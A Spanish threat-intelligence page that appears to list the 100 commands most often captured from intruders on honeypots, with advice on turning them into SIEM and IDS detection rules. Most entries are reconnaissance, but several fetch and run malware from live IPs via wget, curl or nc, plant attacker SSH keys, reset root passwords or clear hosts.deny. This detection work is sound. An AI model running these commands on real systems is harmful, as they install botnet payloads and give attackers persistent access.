Actualizado: diciembre de 2025

Top 100 Comandos Maliciosos

Los comandos más ejecutados por atacantes tras obtener acceso a sistemas. Útil para detección de intrusiones y respuesta a incidentes.

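10,016 comandos en 24h. Cada entrada muestra la línea capturada precedida de «$», seguida del número de IPs de origen y del número de veces que se observó (p. ej., «188 IPs515x» equivale a 188 IPs y 515 ejecuciones). Los comandos largos aparecen truncados, y algunas entradas (como «Enter new UNIX password:» o las cabeceras HTTP) no son comandos propiamente dichos, sino texto recibido durante la sesión.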
1.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
188 IPs515x
2.
$lockr -ia .ssh
188 IPs515x
3.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
184 IPs502x
4.
$uname -a
168 IPs426x
5.
$cat /proc/cpuinfo | grep name | wc -l
162 IPs425x
6.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
164 IPs422x
7.
$lscpu | grep Model
164 IPs421x
8.
$uname
162 IPs420x
9.
$top
160 IPs418x
10.
$whoami
163 IPs417x
11.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
158 IPs417x
12.
$crontab -l
161 IPs417x
13.
$cat /proc/cpuinfo | grep model | grep name | wc -l
160 IPs415x
14.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
160 IPs415x
15.
$uname -m
162 IPs415x
16.
$ls -lh $(which ls)
160 IPs414x
17.
$which ls
160 IPs414x
18.
$w
159 IPs413x
19.
$Enter new UNIX password:
129 IPs254x
20.
$Enter new UNIX password:
129 IPs254x
21.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
107 IPs167x
22.
$cat /proc/uptime 2 > /dev/null | cut -d. -f1
31 IPs128x
23.
$export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version
43 IPs111x
24.
$uname -s -v -n -m 2 > /dev/null
43 IPs111x
25.
$/bin/./uname -s -v -n -r -m
15 IPs84x
26.
$uname -s -v -n -r -m
17 IPs75x
27.
$uname -m 2 > /dev/null
31 IPs64x
28.
$cd /data/local/tmp/; rm *; busybox wget http://94.154.35.154/arm.uhavenobotsxd; curl http://94.154.35.154/arm.uhavenobotsxd -O; chmod +x arm.uhavenobotsxd; ./arm.uhavenobotsxd android; busybox wget http://94.154.35.154/arm5.uhavenobotsxd; curl http://94.154.35.154/arm5.uhavenobotsxd -O; chmod +x arm5.uhavenobotsxd; ./arm5.uhavenobotsxd android; busybox wget http://94.154.35.154/arm6.uhavenobotsxd; curl http://94.154.35.154/arm6.uhavenobotsxd -O; chmod +x arm6.uhavenobotsxd; ./arm6.uhavenobotsxd
1 IPs33x
29.
$cd /data/local/tmp/; busybox wget http://31.97.147.189/w.sh; sh w.sh; curl http://31.97.147.189/c.sh; sh c.sh; wget http://31.97.147.189/wget.sh; sh wget.sh; curl http://31.97.147.189/wget.sh; sh wget.sh; busybox wget http://31.97.147.189/wget.sh; sh wget.sh; busybox curl http://31.97.147.189/wget.sh; sh wget.sh
2 IPs28x
30.
$for d in /data/local/tmp /tmp /dev/shm /var/tmp /data /; do if touch $d/.w 2>/dev/null; then cd $d; rm .w; break; fi; done; rm -f x; arch=$(uname -m); if [ "$arch" = "x86_64" ]; then BIN="shadow.x86_64"; elif [ "$arch" = "i686" ] || [ "$arch" = "i386" ]; then BIN="shadow.x86"; elif [ "$arch" = "mips" ]; then BIN="shadow.mips"; elif [ "$arch" = "mipsel" ]; then BIN="shadow.mpsl"; elif [ "$arch" = "armv7l" ] || [ "$arch" = "armv7" ]; then BIN="shadow.arm7"; elif [ "$arch" = "armv6l" ]; then BIN="s
1 IPs19x
31.
$cd /data/local/tmp/; busybox wget http://130.12.180.20:36695/w.sh; sh w.sh; curl http://130.12.180.20:36695/c.sh; sh c.sh; wget http://130.12.180.20:36695/wget.sh; sh wget.sh; curl http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox wget http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox curl http://130.12.180.20:36695/wget.sh; sh wget.sh
2 IPs13x
32.
$echo SHELL_TEST
1 IPs11x
33.
$shell
5 IPs10x
34.
$system
5 IPs10x
35.
$cd /data/local/tmp; su 0 mkdir .wws || mkdir .wws; cd .wws; toybox nc 130.12.180.76 3338 > parm7; toybox nc 130.12.180.76 3336 > parm5; toybox nc 130.12.180.76 3337 > parm6; toybox nc 130.12.180.76 3335 > parm; su 0 chmod 777 parm7 parm5 parm6 parm || chmod 777 parm7 parm5 parm6 parm; su 0 ./parm7 arm7; ./parm5; ./parm6; ./parm; su 0 ./parm7 arm5 || ./parm5 arm5 || ./parm6 arm5 || ./parm arm5;
1 IPs10x
36.
$uname -s -v -n -r-m
2 IPs9x
37.
$echo SCANNER_TEST
8 IPs9x
38.
$q
4 IPs8x
39.
$curl2
1 IPs7x
40.
$uname -s -m
7 IPs7x
41.
$cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps
1 IPs7x
42.
$echo "cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps" | sh
1 IPs7x
43.
$/ip cloud print
3 IPs6x
44.
$sh
5 IPs5x
45.
$while read i
5 IPs5x
46.
$pm path com.ufo.miner
3 IPs5x
47.
$enable
5 IPs5x
48.
$dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s
4 IPs4x
49.
$Accept-Encoding: gzip
2 IPs4x
50.
$rm .s; exit
4 IPs4x
51.
$chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtB
1 IPs3x
52.
$cat /proc/cpuinfo
3 IPs3x
53.
$ps | grep '[Mm]iner'
3 IPs3x
54.
$ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
3 IPs3x
55.
$ps -ef | grep '[Mm]iner'
3 IPs3x
56.
$ifconfig
3 IPs3x
57.
$echo Hi | cat -n
3 IPs3x
58.
$locate D877F783D5D3EF8Cs
3 IPs3x
59.
$Accept: */*
1 IPs2x
60.
$./0hpbC7Bh
1 IPs2x
61.
$rm /data/local/tmp/ufo.apk
2 IPs2x
62.
$echo "root:5H2Qyrl6Y2mW"|chpasswd|bash
2 IPs2x
63.
$echo "123456\n0pw9ovxJbggS\n0pw9ovxJbggS\n"|passwd
1 IPs1x
64.
$echo "123456789\nUN9fCms1KADP\nUN9fCms1KADP\n"|passwd
1 IPs1x
65.
$echo "123456789\nTfO86uQzuTYx\nTfO86uQzuTYx\n"|passwd
1 IPs1x
66.
$echo "123456789\nIbBjsBl5n8vy\nIbBjsBl5n8vy\n"|passwd
1 IPs1x
67.
$Intel Mac OS X 10_15_7
1 IPs1x
68.
$echo "123456789\n76f8iqg8PUKm\n76f8iqg8PUKm\n"|passwd
1 IPs1x
69.
$echo "123456789\n3fum88QeLtjz\n3fum88QeLtjz\n"|passwd
1 IPs1x
70.
$cat /proc/mounts; /bin/busybox NMYXY
1 IPs1x
71.
$echo "123456789\n1nkQNGjqfAtZ\n1nkQNGjqfAtZ\n"|passwd
1 IPs1x
72.
$echo "123123\nzj9A7hujHD9q\nzj9A7hujHD9q\n"|passwd
1 IPs1x
73.
$cat /proc/mounts; /bin/busybox KUQDM
1 IPs1x
74.
$/bin/busybox KKIVX
1 IPs1x
75.
$echo "123123\nhgDaFiby1R0D\nhgDaFiby1R0D\n"|passwd
1 IPs1x
76.
$echo "123123\nVvtZhVMGfs8l\nVvtZhVMGfs8l\n"|passwd
1 IPs1x
77.
$cat /proc/mounts; /bin/busybox KKIVX
1 IPs1x
78.
$echo "123123\n2LBlWS6oXQBb\n2LBlWS6oXQBb\n"|passwd
1 IPs1x
79.
$echo "123123\n0I4KnCCB8Fvb\n0I4KnCCB8Fvb\n"|passwd
1 IPs1x
80.
$cat /proc/mounts; /bin/busybox ISAOI
1 IPs1x
81.
$echo "1122\n9lWc7tt5NTCd\n9lWc7tt5NTCd\n"|passwd
1 IPs1x
82.
$echo "1q2w3e4r5T\nFv3dzw06Vq3O\nFv3dzw06Vq3O\n"|passwd
1 IPs1x
83.
$cat /proc/mounts; /bin/busybox BHKVR
1 IPs1x
84.
$echo "1\nnpPRqp8RrWqz\nnpPRqp8RrWqz\n"|passwd
1 IPs1x
85.
$echo "1\nf0FjM6lnFlbn\nf0FjM6lnFlbn\n"|passwd
1 IPs1x
86.
$echo "1\nQOdM0eKiXJe7\nQOdM0eKiXJe7\n"|passwd
1 IPs1x
87.
$Chrome/126.0.0.0 Safari/537.36
1 IPs1x
88.
$/bin/busybox ISAOI
1 IPs1x
89.
$./oinasf; dd if=/proc/self/exe bs=22 count=1 || while read i; do echo $i; done < /proc/self/exe || cat /proc/self/exe;
1 IPs1x
90.
$echo "1\n2HE2czVPRFdx\n2HE2czVPRFdx\n"|passwd
1 IPs1x
91.
$echo "1\n0KuBIVaoehoB\n0KuBIVaoehoB\n"|passwd
1 IPs1x
92.
$echo "123\nxIQxRc4LJ4BE\nxIQxRc4LJ4BE\n"|passwd
1 IPs1x
93.
$echo "123\nwyDs7eS5bBkE\nwyDs7eS5bBkE\n"|passwd
1 IPs1x
94.
$echo "123\njqelCevOmsCI\njqelCevOmsCI\n"|passwd
1 IPs1x
95.
$echo "123\njQcJxKtKwa9e\njQcJxKtKwa9e\n"|passwd
1 IPs1x
96.
$echo "123\nciXqCNGg5bhi\nciXqCNGg5bhi\n"|passwd
1 IPs1x
97.
$echo "123\nc7f7zpefMMzv\nc7f7zpefMMzv\n"|passwd
1 IPs1x
98.
$echo "1\nr9gdtPvBZ4uN\nr9gdtPvBZ4uN\n"|passwd
1 IPs1x
99.
$chmod +x ./.797392456851139211/sshd;nohup ./.797392456851139211/sshd 103.145.145.79 109.176.202.12 101.91.114.194 95.214.181.29 111.203.190.237 122.225.202.150 103.228.170.105 89.169.12.61 101.36.228.201 83.142.209.109 50.6.172.32 82.26.91.241 50.6.4.160 158.51.96.38 115.231.181.61 103.145.145.73 47.100.213.47 115.239.255.196 103.218.243.223 121.137.217.242 177.70.2.194 45.81.23.49 27.148.182.148 156.254.3.130 103.145.145.82 45.129.183.157 106.75.29.239 103.214.112.63 2.189.86.111 123.54.197.60
1 IPs1x
100.
$chmod +x ./.5019559907050924016/sshd;nohup ./.5019559907050924016/sshd 106.13.58.88 156.254.3.130 103.145.145.82 154.211.13.102 60.205.152.248 72.60.102.102 119.96.62.55 36.163.199.18 43.163.220.159 156.238.231.2 179.189.229.2 223.75.204.39 190.123.74.50 8.245.24.52 107.175.159.248 115.50.78.147 103.174.130.65 188.166.211.175 189.230.100.92 8.211.165.95 77.110.112.138 103.145.145.78 39.96.223.182 89.42.199.69 123.178.171.238 138.197.163.192 178.128.253.94 180.163.61.238 151.234.162.15 125.124.10
1 IPs1x

Reconocimiento

uname, whoami, cat /etc/passwd

Descarga

wget, curl, tftp

Persistencia

crontab, chmod, chattr

Mov. Lateral

ssh, scp, ping

Uso para Detección

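Estos comandos pueden usarse para crear reglas de detección en SIEM, IDS/IPS y sistemas de monitorización. Monitoriza estos patrones en tus logs para detectar intrusiones. Ten en cuenta que muchos comandos de reconocimiento de la lista (uname, whoami, crontab -l) también son habituales en la administración legítima, por lo que las reglas resultan más fiables cuando correlacionan secuencias o combinaciones (por ejemplo, chattr sobre .ssh seguido de la reescritura de authorized_keys) en lugar de alertar sobre un comando aislado.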